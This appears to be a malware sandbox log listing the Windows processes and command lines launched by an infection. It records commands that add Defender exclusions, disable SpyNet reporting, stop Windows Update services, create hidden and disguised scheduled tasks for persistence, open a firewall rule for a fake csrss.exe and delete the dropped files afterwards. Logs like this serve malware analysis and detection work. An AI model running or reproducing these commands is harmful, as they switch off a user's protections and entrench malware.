C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddc74f0,0x6ddc7500,0x6ddc750c
C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
.\Install.exe /IuCdidQXCBm "385118" /S
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwusntZYb" /SC once /ST 11:05:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwusntZYb"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --version
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xb21588,0xb21598,0xb215a4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwusntZYb"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe\" rd /xzsite_idBSG 385118 /S" /V1 /F
C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3468 -ip 3468
C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2176
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe rd /xzsite_idBSG 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3696 -ip 3696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2104
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
